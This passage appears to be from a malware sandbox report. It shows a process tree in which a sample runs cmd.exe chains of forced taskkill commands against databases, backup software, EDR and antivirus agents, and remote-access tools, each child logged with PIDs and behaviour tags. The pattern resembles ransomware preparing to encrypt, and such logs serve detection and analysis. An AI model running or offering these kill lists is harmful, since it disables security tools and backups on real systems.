/IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T & whoami"
    3⤵
    PID:4188
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VBoxSDS.exe /F
      4⤵
      Kills process with taskkill
      PID:4812
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mysqld.exe /F
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer_Service.exe /F
      4⤵
      PID:4992
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer.exe /F
      4⤵
      PID:4296
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CasLicenceServer.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4992
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tv_w32.exe /F
      4⤵
      PID:1712
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tv_x64.exe /F
      4⤵
      PID:2220
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM rdm.exe /F
      4⤵
      PID:3008
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SecureCRT.exe /F
      4⤵
      PID:4328
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SecureCRTPortable.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2832
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VirtualBox.exe /F
      4⤵
      PID:1664
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VBoxSVC.exe /F
      4⤵
      PID:2816
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VirtualBoxVM.exe /F
      4⤵
      PID:5056
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM abs_deployer.exe /F
      4⤵
      PID:2548
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_monitor.exe /F
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sfupdatemgr.exe /F
      4⤵
      PID:4700
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ipc_proxy.exe /F
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_agent.exe /F
      4⤵
      PID:4788
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_sec_plan.exe /F
      4⤵
      PID:4148
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sfavsvc.exe /F
      4⤵
      PID:4752
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F
      4⤵
      PID:968
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DataShareBox.ShareBoxService.exe /F
      4⤵
      PID:4932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Jointsky.CloudExchangeService.exe /F
      4⤵
      PID:2548
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Jointsky.CloudExchange.NodeService.ein /F
      4⤵
      Kills process with taskkill
      PID:5044
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM perl.exe /F
      4⤵
      Kills process with taskkill
      PID:4976
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM java.exe /F
      4⤵
      PID:1296
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM emagent.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4812
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TsServer.exe /F
      4⤵
      PID:3640
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AppMain.exe /F
      4⤵
      PID:4428
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM easservice.exe /F
      4⤵
      PID:4736
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Kingdee6.1.exe /F
      4⤵
      PID:5016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QyKernel.exe /F
      4⤵
      PID:4648
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QyFragment.exe /F
      4⤵
      PID:4532
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UserClient.exe /F
      4⤵
      PID:308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      PID:4100
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      PID:928
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4752
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ComputerZTray.exe /F
      4⤵
      PID:2032
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ComputerZService.exe /F
      4⤵
      PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
    3⤵
    PID:4180
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BackupExec.exe /F
      4⤵
      PID:4696
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Att.exe /F
      4⤵
      PID:4944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mdm.exe /F
      4⤵
      PID:4908
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BackupExecManagementService.exe /F
      4⤵
      PID:1476
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bengine.exe /F
      4⤵
      PID:3644
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM benetns.exe /F
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beserver.exe /F
      4⤵
      PID:5028
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM pvlsvr.exe /F
      4⤵
      PID:3088
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bedbg.exe /F
      4⤵
      PID:1228
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      Kills process with taskkill
      PID:4936
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:1168
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4856
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      Kills process with taskkill
      PID:2204
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RemoteAssistProcess.exe /F
      4⤵
      PID:3080
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarMoniService.exe /F
      4⤵
      PID:3796
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoodGameSrv.exe /F
      4⤵
      Kills process with taskkill
      PID:4140
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarCMService.exe /F
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TsService.exe /F
      4⤵
      PID:4524
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoodGame.exe /F
      4⤵
      PID:2528
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarServerView.exe /F
      4⤵
      PID:2000
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IcafeServicesTray.exe /F
      4⤵
      PID:1604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BsAgent_0.exe /F
      4⤵
      PID:4708
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ControlServer.exe /F
      4⤵
      PID:4512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DisklessServer.exe /F
      4⤵
      PID:4648
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DumpServer.exe /F
      4⤵
      PID:3860
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM NetDiskServer.exe /F
      4⤵
      PID:4844
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM PersonUDisk.exe /F
      4⤵
      PID:2912
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM service_agent.exe /F
      4⤵
      PID:4628
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SoftMemory.exe /F
      4⤵
      PID:4636
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarServer.exe /F
      4⤵
      PID:5072
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RtkNGUI64.exe /F
      4⤵
      PID:3416
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Serv-U-Tray.exe /F
      4⤵
      PID:4644
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QQPCSoftTrayTips.exe /F
      4⤵
      PID:1808
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SohuNews.exe /F
      4⤵
      PID:3316
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Serv-U.exe /F
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QQPCRTP.exe /F
      4⤵
      PID:1776
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM EasyFZS.exe /F
      4⤵
      PID:3092
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM HaoYiShi.exe /F
      4⤵
      PID:4812
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM HysMySQL.exe /F
      4⤵
      PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
    3⤵
    PID:4172
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM pg_ctl.exe /F
      4⤵
      PID:4568
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM rcrelay.exe /F
      4⤵
      PID:372
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SogouImeBroker.exe /F
      4⤵
      Kills process with taskkill
      PID:2832
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CCenter.exe /F
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ScanFrm.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4904
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM d_manage.exe /F
      4⤵
      PID:4564
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RsTray.exe /F
      4⤵
      PID:2592
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM wampmanager.exe /F
      4⤵
      PID:4744
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RavTray.exe /F
      4⤵
      PID:3616
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mssearch.exe /F
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlmangr.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4536
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM msftesql.exe /F
      4⤵
      PID:4688
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SyncBaseSvr.exe /F
      4⤵
      Kills process with taskkill
      PID:4772
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM oracle.exe /F
      4⤵
      PID:1056
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TNSLSNR.exe /F
      4⤵
      PID:5108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SyncBaseConsole.exe /F
      4⤵
      PID:4944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM aspnet_state.exe /F
      4⤵
      PID:4676
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AutoBackUpEx.exe /F
      4⤵
      PID:1212
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM redis-server.exe /F
      4⤵
      PID:4616
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MySQLNotifier.exe /F
      4⤵
      Kills process with taskkill
      PID:1108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM oravssw.exe /F
      4⤵
      PID:3640
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fppdis5.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM His6Service.exe /F
      4⤵
      PID:3764
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM dinotify.exe /F
      4⤵
      PID:1772
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM JhTask.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Executer.exe /F
      4⤵
      PID:3020
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AllPassCBHost.exe /F
      4⤵
      PID:2836
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ap_nginx.exe /F
      4⤵
      PID:2360
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AndroidServer.exe /F
      4⤵
      PID:1372
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM XT.exe /F
      4⤵
      PID:5024
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM XTService.exe /F
      4⤵
      PID:4932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AllPassMCService.exe /F
      4⤵
      PID:4512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IMEDICTUPDATE.exe /F
      4⤵
      PID:3796
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM FlashHelperService.exe /F
      4⤵
      Kills process with taskkill
      PID:4852
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ap_redis-server.exe /F
      4⤵
      PID:3688
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UtilDev.WebServer.Monitor.exe /F
      4⤵
      PID:4844
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UWS.AppHost.Clr2.x86.exe /F
      4⤵
      PID:4108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM FoxitProtect.exe /F
      4⤵
      PID:5028
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ftnlses.exe /F
      4⤵
      PID:1480
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ftusbrdwks.exe /F
      4⤵
      PID:4136
